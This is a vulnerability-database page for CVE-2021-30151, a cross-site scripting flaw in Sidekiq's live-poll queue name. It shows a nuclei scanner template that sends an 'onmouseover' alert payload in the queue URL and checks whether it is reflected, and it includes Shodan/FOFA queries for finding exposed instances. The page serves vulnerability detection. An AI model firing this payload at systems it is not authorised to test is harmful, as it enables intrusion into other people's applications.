Lucene search
K

Sidekiq <=6.2.0 - Cross-Site Scripting

🗓️ 10 Jul 2026 03:01:38Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

Sidekiq <=6.2.0 - Cross-Site Scripting vulnerability via live-poll feature queue name, impacts unauthorized access, data theft, session hijacking. Upgrade to Sidekiq version 6.2.0 or later to mitigate

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-30151
14 Aug 202519:23
circl
CNNVD
Mike Perham sidekiq 跨站脚本漏洞
6 Apr 202100:00
cnnvd
CNVD
Mike Perham sidekiq cross-site scripting vulnerability
7 Apr 202100:00
cnvd
CVE
CVE-2021-30151
6 Apr 202100:00
cve
Cvelist
CVE-2021-30151
6 Apr 202100:00
cvelist
Debian
[SECURITY] [DLA 2943-1] ruby-sidekiq security update
10 Mar 202219:59
debian
Debian
[SECURITY] [DLA 3360-1] ruby-sidekiq security update
12 Mar 202320:49
debian
Debian
[SECURITY] [DLA 4407-1] ruby-sidekiq security update
14 Dec 202519:20
debian
Debian CVE
CVE-2021-30151
6 Apr 202100:00
debiancve
Tenable Nessus
Debian DLA-2943-1 : ruby-sidekiq - LTS security update
11 Mar 202200:00
nessus
Rows per page
id: CVE-2021-30151

info:
  name: Sidekiq <=6.2.0 - Cross-Site Scripting
  author: DhiyaneshDk
  severity: medium
  description: Sidekiq through 5.1.3 and 6.x through 6.2.0 contains a cross-site scripting vulnerability via the queue name of the live-poll feature when Internet Explorer is used.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or session hijacking.
  remediation: |
    Upgrade to Sidekiq version 6.2.0 or later to mitigate this vulnerability.
  reference:
    - https://github.com/mperham/sidekiq/issues/4852
    - https://lists.debian.org/debian-lts-announce/2022/03/msg00015.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-30151
    - https://lists.debian.org/debian-lts-announce/2023/03/msg00011.html
    - https://github.com/Elsfa7-110/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-30151
    cwe-id: CWE-79
    epss-score: 0.04158
    epss-percentile: 0.89674
    cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: contribsys
    product: sidekiq
    shodan-query:
      - title:"Sidekiq"
      - http.title:"sidekiq"
    fofa-query: title="sidekiq"
    google-query: intitle:"sidekiq"
  tags: cve2021,cve,xss,sidekiq,authenticated,contribsys,vuln

http:
  - raw:
      - |
        POST /api/auth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"email":"{{username}}","password":"{{password}}"}
      - |
        GET /queues/"onmouseover="alert(document.domain)" HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'onmouseover="alert(document.domain)'
          - 'sidekiq'
        condition: and
        case-insensitive: true

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ad438290a675f8c685ec233f4846d017d381c8ac6e88289ec8b42fc6a3a3b02402201685c151c22b35aeb8c8c5e29bdc5b7dbfc25f4e60fb3915e2bc15b3d6443472:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 3.16.1
EPSS0.04158
29